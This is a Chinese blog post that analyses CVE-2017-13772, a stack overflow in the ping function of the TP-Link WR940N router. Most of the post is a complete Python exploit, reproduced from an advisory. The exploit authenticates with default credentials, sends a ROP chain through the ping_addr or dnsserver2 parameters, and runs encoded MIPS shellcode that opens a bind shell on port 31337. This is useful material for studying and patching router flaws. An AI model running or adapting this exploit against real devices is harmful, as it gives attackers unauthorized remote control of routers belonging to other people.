前言

本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274

这个是最近爆出来的漏洞,漏洞编号:CVE-2017-13772

固件链接:http://static.tp-link.com/TL-WR940N(US)_V4_160617_1476690524248q.zip

之前使用 firmadyn 可以正常模拟运行,但是调试不了,就没有仔细看这个漏洞。今天突然想起 他会启动一个 ssh 服务,那我们是不是就可以通过ssh 连上去进行调试,正想试试,又不能正常模拟了。。。。。下面看具体漏洞。

正文

漏洞位与 管理员用来 ping 的功能,程序在获取ip 地址时没有验证长度,然后复制到栈上,造成栈溢出。搜索关键字符串 ping_addr 定位到函数 sub_453C50

获取 ip 地址后,把字符串指针放到 $s6寄存器,跟下去看看。

传入了ipAddrDispose函数,继续分析之:

先调用了 memset  初始化缓冲区,然后调用 strcpyip 地址复制到栈上,溢出。

利用的话和前文是一样的,经典的栈溢出,经典的 rop。

一步一步pwn路由器之rop技术实战

一步一步pwn路由器之路由器环境修复&&rop技术分析

附上参考链接里的 exp

#!/usr/bin/python

# -*- coding: UTF-8 -*-

import urllib2

import base64

import hashlib

from optparse import *

import sys

import urllib

banner = (

"___________________________________________________________________________\n"

"WR940N Authenticated Remote Code Exploit\n"

"This exploit will open a bind shell on the remote target\n"

"The port is 31337, you can change that in the code if you wish\n"

"This exploit requires authentication, if you know the creds, then\n"

"use the -u -p options, otherwise default is admin:admin\n"

"___________________________________________________________________________"

)

def login(ip, user, pwd):

	print "[+] Attempting to login to http://%s %s:%s"%(ip,user,pwd)

	#### Generate the auth cookie of the form b64enc('admin:' + md5('admin'))

	hash = hashlib.md5()

	hash.update(pwd)

	auth_string = "%s:%s" %(user, hash.hexdigest())

	encoded_string = base64.b64encode(auth_string)

	print "[+] Encoded authorisation: %s" %encoded_string#### Send the request

	url = "http://" + ip + "/userRpm/LoginRpm.htm?Save=Save"

	print "[+] sending login to " + url

	req = urllib2.Request(url)

	req.add_header('Cookie', 'Authorization=Basic %s' %encoded_string)

	resp = urllib2.urlopen(req)

	#### The server generates a random path for further requests, grab that here

	data = resp.read()

	next_url = "http://%s/%s/userRpm/" %(ip, data.split("/")[3])

	print "[+] Got random path for next stage, url is now %s" %next_url

	return (next_url, encoded_string)

#custom bind shell shellcode with very simple xor encoder

#followed by a sleep syscall to flush cash before running

#bad chars = 0x20, 0x00

shellcode = (

#encoder

"\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99"

"\x27\xb2\x05\x4b" #0x27b2059f for first_exploit

"\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9"

"\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x41"

"\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d"

"\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71"

"\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d"

"\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99"

"\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5"

"\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad"

"\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9"

"\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1"

"\x02\x2a\x18\x26\xae\x43\xff\xc1"

#sleep

"\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08"

"\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"

"\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c"

################ encoded shellcode ###############

"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06"

"\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff"

"\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d"

"\x7a\x69"            #<————————- PORT 0x7a69 (31337)

"\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad"

"\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc"

"\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01"

"\x01\x0c\x24\x0f\x73\x50"

"\x9b\x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f"

"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48"

"\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f"

"\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50"

"\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f"

"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c"

"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce"

"\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8"

"\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02"

"\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"

"\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"

)

###### useful gadgets #######

nop = "\x22\x51\x44\x44"

gadg_1 = "\x2A\xB3\x7C\x60"  # set $a0 = 1, and jmp $s1

gadg_2 = "\x2A\xB1\x78\x40"

sleep_addr = "\x2a\xb3\x50\x90"

stack_gadg = "\x2A\xAF\x84\xC0"

call_code = "\x2A\xB2\xDC\xF0"

def first_exploit(url, auth):

	#          trash $s1        $ra

	rop = "A"*164 + gadg_2  + gadg_1 + "B"*0x20 + sleep_addr + "C"*4

	rop += "C"*0x1c + call_code + "D"*4 + stack_gadg + nop*0x20 + shellcode

	params = {'ping_addr': rop, 'doType': 'ping', 'isNew': 'new', 'sendNum': '20', 'pSize': '64', 'overTime': '800', 'trHops': '20'}

	new_url = url + "PingIframeRpm.htm?" + urllib.urlencode(params)

	print "[+] sending exploit…"

	print "[+] Wait a couple of seconds before connecting"

	print "[+] When you are finished do http -r to reset the http service"

	req = urllib2.Request(new_url)

	req.add_header('Cookie', 'Authorization=Basic %s' %auth)

	req.add_header('Referer', url + "DiagnosticRpm.htm")

	resp = urllib2.urlopen(req)

def second_exploit(url, auth):

	url = url + "WanStaticIpV6CfgRpm.htm?"

	#                 trash      s0      s1      s2       s3     s4      ret     shellcode

	payload = "A"*111 + "B"*4 + gadg_2 + "D"*4 + "E"*4 + "F"*4 + gadg_1 + "a"*0x1c

	payload += "A"*4 + sleep_addr + "C"*0x20 + call_code + "E"*4

	payload += stack_gadg + "A"*4 +  nop*10 + shellcode + "B"*7

	print len(payload)

	params = {'ipv6Enable': 'on', 'wantype': '2', 'ipType': '2', 'mtu': '1480', 'dnsType': '1',

	'dnsserver2': payload, 'ipAssignType': '0', 'ipStart': '1000',

	'ipEnd': '2000', 'time': '86400', 'ipPrefixType': '0', 'staticPrefix': 'AAAA',

	'staticPrefixLength': '64', 'Save': 'Save', 'RenewIp': '1'}

	new_url = url + urllib.urlencode(params)

	print "[+] sending exploit…"

	print "[+] Wait a couple of seconds before connecting"

	print "[+] When you are finished do http -r to reset the http service"

	req = urllib2.Request(new_url)

	req.add_header('Cookie', 'Authorization=Basic %s' %auth)

	req.add_header('Referer', url + "WanStaticIpV6CfgRpm.htm")

	resp = urllib2.urlopen(req)

if __name__ == '__main__':

	print banner

	username = "admin"

	password = "admin"

	(next_url, encoded_string) = login("192.168.0.1", username, password)

	###### Both exploits result in the same bind shell ######

	#first_exploit(data[0], data[1])

	first_exploit(next_url, encoded_string)

参考链接:

https://www.fidusinfosec.com/tp-link-remote-code-execution-cve-2017-13772/

一步一步pwn路由器之wr940栈溢出漏洞分析与利用的更多相关文章

  1. 一步一步pwn路由器之rop技术实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 这次程序也是 DVRF 里面的,他的路径是 pwnable/She ...

  2. 一步一步pwn路由器之环境搭建

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 正式进入路由器的世界了.感觉路由器这块就是固件提取,运行环境修复比 ...

  3. 一步一步pwn路由器之uClibc中malloc&&free分析

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 栈溢出告一段落.本文介绍下 uClibc 中的 malloc 和 ...

  4. 一步一步pwn路由器之radare2使用全解

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 radare2 最近越来越流行,已经进入 github 前 25了 ...

  5. 一步一步pwn路由器之radare2使用实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 前文讲了一些 radare2 的特性相关的操作方法.本文以一个 c ...

  6. 一步一步pwn路由器之路由器环境修复&&rop技术分析

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 拿到路由器的固件后,第一时间肯定是去运行目标程序,一般是web服务 ...

  7. 一步一步pwn路由器之栈溢出实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 本文以 DVRF 中的第一个漏洞程序 stack_bof_01 为 ...

  8. 简单实例一步一步帮你搞清楚MVC3中的路由以及区域

    我们都知道MVC 3 程序的所有请求都是先经过路由解析然后分配到特定的Controller 以及 Action 中的,为什么这些知识讲完了Controller Action Model 后再讲呢?这个 ...

  9. 【计算机网络】一步一步学习IP路由流程

    TCP/IP协议簇是目前互联网应用最广的协议栈,谈到TCP/IP协议栈就不能不讲一讲IP路由的问题,因为在我们使用的网络通信中几乎每时每刻都在发生着IP路由的事件…….当你在网络世界中还是一位新手的时 ...

随机推荐

  1. Netty学习笔记(二)——netty组件及其用法

    1.Netty是 一个异步事件驱动的网络应用程序框架,用于快速开发可维护的高性能协议服务器和客户端. 原生NIO存在的问题 1) NIO的类库和API繁杂,使用麻烦:需要熟练掌握Selector.Se ...

  2. Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)

    mysql使用可视化界面登录使用的时候都没问题,只要使用xhell命令进入mysql就报异常 Can't connect to local MySQL server through socket '/ ...

  3. RISC-V汇编指南

    原文出处:https://github.com/riscv/riscv-asm-manual/blob/master/riscv-asm.md RISC-V Assembly Programmer's ...

  4. JMeter接口自动化学习笔记(一)

    实例教程:https://blog.csdn.net/kasijia/article/details/79405815 https://www.cnblogs.com/rd-ddddd/p/95782 ...

  5. 20191011-构建我们公司自己的自动化接口测试框架-TestData的数据准备

    创建excel测试数据准备,excel的第一个sheet存储测试集,后面分别为测试用例和断言结果表 测试集构成如下: 按列分别为测试序号,测试用例说明,对应的sheetname,测试用例是否允许,测试 ...

  6. 2019java学习路线图

    学习路线图往往是学习一样技术的入门指南.网上搜到的Java学习路线图也是一抓一大把.但是很多学习路线图总结的云里雾里,也没有配套的视频,学习效果并不好. 分享一个完整的Java学习路线图给大家,也是贴 ...

  7. MogileFS与spring结合

    一.通过Maven添加MogileFS的Java客户端驱动包 <dependency> <groupId>fm.last</groupId> <artifac ...

  8. (二十一)SpringBoot之集成mybatis:使用mybatis xml

    一.引入maven依赖 <dependencies> <dependency> <groupId>org.springframework.boot</grou ...

  9. centos从安装到环境配置

    1.安装centos6.5    http://jingyan.baidu.com/article/25648fc1a235c99191fd0008.html 2.配置网络ip   http://ji ...

  10. ml

    基础篇: 1. 读书<Introduction to Data Mining>,这本书很浅显易懂,没有复杂高深的公式,很合适入门的人.另外可以用这本书做参考<Data Mining ...